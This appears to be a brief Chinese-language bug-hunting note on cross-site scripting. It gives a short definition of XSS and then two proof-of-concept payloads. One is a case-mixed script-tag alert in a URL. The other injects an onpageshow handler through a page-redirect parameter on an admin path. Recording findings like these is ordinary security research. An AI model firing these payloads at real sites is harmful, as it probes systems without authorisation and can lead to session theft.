前言
XSS挖洞笔记,仅作记录
漏洞描述
跨站点脚本(XSS)是指客户端代码注入攻击,其中,攻击者可以将恶意脚本执行到合法网站或Web应用程序中。当Web应用程序在其生成的输出中使用未经验证或未编码的用户输入时,就会发生XSS。
漏洞验证
http://xx.xx.xx.xx?id=1'"()%26%25<acx><ScRiPt%20>alert(9999)</ScRiPt>
payload
?gotopage=/web/admin/"><body%20OnpageshOw=alert(1)>"